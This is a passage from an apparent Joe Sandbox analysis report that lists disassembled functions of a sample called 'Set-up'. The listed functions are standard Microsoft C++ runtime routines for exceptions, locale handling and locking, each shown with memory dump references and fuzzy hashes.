                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD5B
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DDAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?clear@ios_base@std@@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@H_prolog3_catchV12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 3987592289-0
                                                                                              • Opcode ID: 00f90778b385ca2cc68ca01b003318f67616faead2fdb31070617fafa0851fa5
                                                                                              • Instruction ID: 361907c8c5eaaa41d90b1f9fbb5038dec2c38600e4126c22b6227c50befd1f11
                                                                                              • Opcode Fuzzy Hash: 00f90778b385ca2cc68ca01b003318f67616faead2fdb31070617fafa0851fa5
                                                                                              • Instruction Fuzzy Hash: 393175746691009FC714EF78C1D0A5877F1BF44318714849DE156AB792EB3AEB42DB50
                                                                                              Function 6BC20D64 Relevance: 10.6, APIs: 7, Instructions: 75COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                              • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@
                                                                                              • String ID:
                                                                                              • API String ID: 2939144689-0
                                                                                              • Opcode ID: f93cbbd2e78f460772179cda2e8321382775941de23ef14b6348f52255d4dbd9
                                                                                              • Instruction ID: 516a0ef65030969d8d0c29a4f0dfc49203cc748eba0aefcf8f866fd7b5a4343e
                                                                                              • Opcode Fuzzy Hash: f93cbbd2e78f460772179cda2e8321382775941de23ef14b6348f52255d4dbd9
                                                                                              • Instruction Fuzzy Hash: C611EC7681021CBBCB11DF99D4458CE7FBCEA94291F508166FA1597600EA78D748CBE1
                                                                                              Function 6BC17CC9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC17CEA
                                                                                              • _CxxThrowException.MSVCR100(6BC117B8,6BC4C848), ref: 6BC17D00
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC17D19
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC17D49
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@XZ.MSVCR100 ref: 6BC204A9
                                                                                                • Part of subcall function 6BC2049E: _CxxThrowException.MSVCR100(?,6BC48440), ref: 6BC204BF
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC48440), ref: 6BC204D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xfunc@tr1@std@@
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 18525139-3961265847
                                                                                              • Opcode ID: 9100e085db86e3d28225f1873350db4e0acb951ae5e6f39c11a9d35ec5abefa1
                                                                                              • Instruction ID: 123161842b4b4e5b648f749cd3b34b7958f1eca983b872e68c0ddd7a0106ae41
                                                                                              • Opcode Fuzzy Hash: 9100e085db86e3d28225f1873350db4e0acb951ae5e6f39c11a9d35ec5abefa1
                                                                                              • Instruction Fuzzy Hash: B311B1B592520DEFCB00EFA9C444AEAB778FF55354F00859AE855A7200F738D345EBA0
                                                                                              Function 6BC172FE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1731F
                                                                                              • _CxxThrowException.MSVCR100(6BC117B8,6BC4C848), ref: 6BC17335
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1734E
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC1737E
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@XZ.MSVCR100 ref: 6BC204A9
                                                                                                • Part of subcall function 6BC2049E: _CxxThrowException.MSVCR100(?,6BC48440), ref: 6BC204BF
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC48440), ref: 6BC204D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xfunc@tr1@std@@
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 18525139-3961265847
                                                                                              • Opcode ID: 74f54d17e52bd57853f6e4adfc99578a822f74598db1fcc57db401be8dcce0b4
                                                                                              • Instruction ID: 9e029408899829dd20409506621d4d2dab29c13ced59ce2e297bac1576c280ff
                                                                                              • Opcode Fuzzy Hash: 74f54d17e52bd57853f6e4adfc99578a822f74598db1fcc57db401be8dcce0b4
                                                                                              • Instruction Fuzzy Hash: 0C11A2B5A24209EFCF00DF95C444A9EBB78FF55314B40859AE811A7250F73CD345EB60
                                                                                              Function 6BC1AC8F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC1ACAE
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8F0), ref: 6BC1ACC4
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ACDB
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1AD04
                                                                                              • ??0message_not_found@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AD12
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$??0bad_target@??0exception@std@@??0message_not_found@?set@event@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 2605033615-988830941
                                                                                              • Opcode ID: 4cda72124bca8e6bf0646294d984dca905c9e48d5e73cc4ca8f40870d9eeb8ec
                                                                                              • Instruction ID: c655afd1122a5c2bdb500dc6bed52846319d7a66def6d1b001bb50302dce7aad
                                                                                              • Opcode Fuzzy Hash: 4cda72124bca8e6bf0646294d984dca905c9e48d5e73cc4ca8f40870d9eeb8ec
                                                                                              • Instruction Fuzzy Hash: DA113C31814108EFCB10DF99C449ADAB7B8FB55311B508499E566A6250F739EB48DF60
                                                                                              Function 6BC1EDB4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1EDD8
                                                                                              • _CxxThrowException.MSVCR100(6BC11790,6BC4CACC), ref: 6BC1EDEE
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E7C,6BC11790,6BC4CACC), ref: 6BC1EE01
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1EE26
                                                                                              Strings
                                                                                              • Index is inside segment which failed to be allocated, xrefs: 6BC1EDD1
                                                                                              • Index out of segments table range, xrefs: 6BC1EDFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow
                                                                                              • String ID: Index is inside segment which failed to be allocated$Index out of segments table range
                                                                                              • API String ID: 754070855-2678207525
                                                                                              • Opcode ID: a30712d4f260e5f0f3b0faa7bf2576de7911746a32844231fdd6643d29cb5b48
                                                                                              • Instruction ID: b4de86956c1e07e1c4f534a579f969ee1facd87d5f0d79d4c1cc87a50a88eac3
                                                                                              • Opcode Fuzzy Hash: a30712d4f260e5f0f3b0faa7bf2576de7911746a32844231fdd6643d29cb5b48
                                                                                              • Instruction Fuzzy Hash: 730100B583811DABCB00DF95D485ADE7B78FB15385F404155E505F6600FB78D788DBA0
                                                                                              Function 6BC198DC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC198E3
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC198F4
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19913
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC19929
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1994D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 785021205-988830941
                                                                                              • Opcode ID: d45fcda0c71ed6c7acfda97dc67a1519103a6182e43751c9a6f1117e08c56778
                                                                                              • Instruction ID: 61f820c9cc5a9b491a336902c8d0921cbb3e63f16ec97e271d21e9b79d3bad08
                                                                                              • Opcode Fuzzy Hash: d45fcda0c71ed6c7acfda97dc67a1519103a6182e43751c9a6f1117e08c56778
                                                                                              • Instruction Fuzzy Hash: 1401B135410104DFCB00CFA4C48AEDEBBB4FF99320F50416AE556EB250EB389745DBA0
                                                                                              Function 6BC19960 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19967
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19978
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19997
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC199AD
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC199CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 785021205-988830941
                                                                                              • Opcode ID: 4ffc338ca6134af60f0de287a0afcc26f00f05b6f383aad6a62df5afb66a276f
                                                                                              • Instruction ID: fe7cff32e8945c67bd39630e258b996edcb000550edd969b6ee00a23158652bb
                                                                                              • Opcode Fuzzy Hash: 4ffc338ca6134af60f0de287a0afcc26f00f05b6f383aad6a62df5afb66a276f
                                                                                              • Instruction Fuzzy Hash: C801A231410208DFCB14CFA4C486EEEBB74FF55361F504169E566AB150EB389746DBA0
                                                                                              Function 6BC25B5B Relevance: 10.5, APIs: 7, Instructions: 33COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC25B62
                                                                                              • _Getcvt.MSVCP100(00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?), ref: 6BC25B6C
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014), ref: 6BC25B89
                                                                                                • Part of subcall function 6BC1B8D6: _Getdays.MSVCR100 ref: 6BC1B8DC
                                                                                                • Part of subcall function 6BC1B8D6: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B8EC
                                                                                                • Part of subcall function 6BC1B8D6: free.MSVCR100 ref: 6BC1B8F2
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC25B8F
                                                                                                • Part of subcall function 6BC2241F: strlen.MSVCR100 ref: 6BC22432
                                                                                                • Part of subcall function 6BC2241F: _Mbrtowc.MSVCP100(00000000,?,00000001,00000020,00000001,?,?,00000000), ref: 6BC22454
                                                                                                • Part of subcall function 6BC2241F: _Mbrtowc.MSVCP100(00000000,?,00000001,00000000,00000000,?,?,00000000), ref: 6BC22499
                                                                                              • ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC25B9F
                                                                                                • Part of subcall function 6BC1B90F: _Getmonths.MSVCR100 ref: 6BC1B915
                                                                                                • Part of subcall function 6BC1B90F: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B925
                                                                                                • Part of subcall function 6BC1B90F: free.MSVCR100 ref: 6BC1B92B
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC25BA5
                                                                                              • _Getdateorder.MSVCP100 ref: 6BC25BB0
                                                                                                • Part of subcall function 6BC3B33D: ___lc_handle_func.MSVCR100 ref: 6BC3B357
                                                                                                • Part of subcall function 6BC3B33D: GetLocaleInfoW.KERNEL32(?,?,?,6BC25863), ref: 6BC3B360
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??4?$_D@std@@Locinfo@std@@MaklocstrMbrtowcV01@Yarn@___lc_handle_funcfree$GetcvtGetdateorderGetdaysGetdays@_GetmonthsGetmonths@_H_prolog3_catchInfoLocale___lc_codepage_funcstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2864360128-0
                                                                                              • Opcode ID: 4cc154acc5e2c8bb6164a497b7fc9fdd74b5cd0ec24709d4467fed0ff40cf916
                                                                                              • Instruction ID: 2c58e3ccac4e90a7e7f170b8936b74e4aa743e406be99932f64b7704346a607c
                                                                                              • Opcode Fuzzy Hash: 4cc154acc5e2c8bb6164a497b7fc9fdd74b5cd0ec24709d4467fed0ff40cf916
                                                                                              • Instruction Fuzzy Hash: BFF012B0C207159BCB209F75849590BBBF4BF84708B41893DE1599B600FB3C9715CB50
                                                                                              Function 6BC25809 Relevance: 10.5, APIs: 7, Instructions: 33COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC25810
                                                                                              • _Getcvt.MSVCP100(00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?), ref: 6BC2581A
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014), ref: 6BC25837
                                                                                                • Part of subcall function 6BC1B8D6: _Getdays.MSVCR100 ref: 6BC1B8DC
                                                                                                • Part of subcall function 6BC1B8D6: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B8EC
                                                                                                • Part of subcall function 6BC1B8D6: free.MSVCR100 ref: 6BC1B8F2
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC2583D
                                                                                                • Part of subcall function 6BC23503: strlen.MSVCR100 ref: 6BC2350E
                                                                                              • ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC2584D
                                                                                                • Part of subcall function 6BC1B90F: _Getmonths.MSVCR100 ref: 6BC1B915
                                                                                                • Part of subcall function 6BC1B90F: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B925
                                                                                                • Part of subcall function 6BC1B90F: free.MSVCR100 ref: 6BC1B92B
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC25853
                                                                                              • _Getdateorder.MSVCP100 ref: 6BC2585E
                                                                                                • Part of subcall function 6BC3B33D: ___lc_handle_func.MSVCR100 ref: 6BC3B357
                                                                                                • Part of subcall function 6BC3B33D: GetLocaleInfoW.KERNEL32(?,?,?,6BC25863), ref: 6BC3B360
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??4?$_D@std@@Locinfo@std@@MaklocstrV01@Yarn@___lc_handle_funcfree$GetcvtGetdateorderGetdaysGetdays@_GetmonthsGetmonths@_H_prolog3_catchInfoLocale___lc_codepage_funcstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1792450307-0
                                                                                              • Opcode ID: 898b5705f87800bf7d37a27b820e3579fdc7640f094f7d01ab9d6ee2dc104f39
                                                                                              • Instruction ID: 075d8dbd1ff29e897b608ad1c6a0ef251bd27f403e3272bb65a26b3e5bbcae19
                                                                                              • Opcode Fuzzy Hash: 898b5705f87800bf7d37a27b820e3579fdc7640f094f7d01ab9d6ee2dc104f39
                                                                                              • Instruction Fuzzy Hash: 68F0FFB0C107059ECB209F75848590ABBB4BF84608B41883EE05EAB600EB3DD7148B50
                                                                                              Function 6BC358A7 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 488COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC358AE
                                                                                              • ?_Getffldx@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHPADAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@1AAVios_base@2@PAH@Z.MSVCP100(?,?,?,00000000,?,?,00000060,6BC385E1,?,?,?,?,?,00000000,00000000), ref: 6BC358E0
                                                                                                • Part of subcall function 6BC31DF6: __EH_prolog3_GS.LIBCMT ref: 6BC31DFD
                                                                                                • Part of subcall function 6BC31DF6: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000006C,6BC358E5,?,?,?,00000000,?,?,00000060,6BC385E1,?,?,?,?,?), ref: 6BC31E1E
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000060,6BC385E1,?,?,?,?,?,00000000,00000000), ref: 6BC358F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@H_prolog3_U?$char_traits@V?$istreambuf_iterator@Vlocale@2@$D@std@@@2@1D@std@@@std@@@std@@Getffldx@?$num_get@Vios_base@2@
                                                                                              • String ID: $
                                                                                              • API String ID: 3550892291-3993045852
                                                                                              • Opcode ID: 8cbeece4fd272cdc87c55525742a25ba600420570d0946d52f3dbdb0ad7e74a2
                                                                                              • Instruction ID: 214b28c04023c36aa7d162c04728a6b8c723a426efbfdaed79e527b599bbdb8f
                                                                                              • Opcode Fuzzy Hash: 8cbeece4fd272cdc87c55525742a25ba600420570d0946d52f3dbdb0ad7e74a2
                                                                                              • Instruction Fuzzy Hash: BE12A330E297E88FEF169BA4C4547ADBBF1AF02708F44808EC6966B285E77C4745C752
                                                                                              Function 6BC192A4 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,C18D2153), ref: 6BC192DF
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC19324
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19338
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC193A1
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC193C6
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19403
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??0_??1_V123@@
                                                                                              • String ID:
                                                                                              • API String ID: 1298863651-0
                                                                                              • Opcode ID: a7933c21c74665e12056af06d1195177ffdcc1323e9c33c5040b1b974f7f7b9a
                                                                                              • Instruction ID: 304ca302e5598c0d52b3a38662d8b65d4627876cc5eadca64d2fac52338686de
                                                                                              • Opcode Fuzzy Hash: a7933c21c74665e12056af06d1195177ffdcc1323e9c33c5040b1b974f7f7b9a
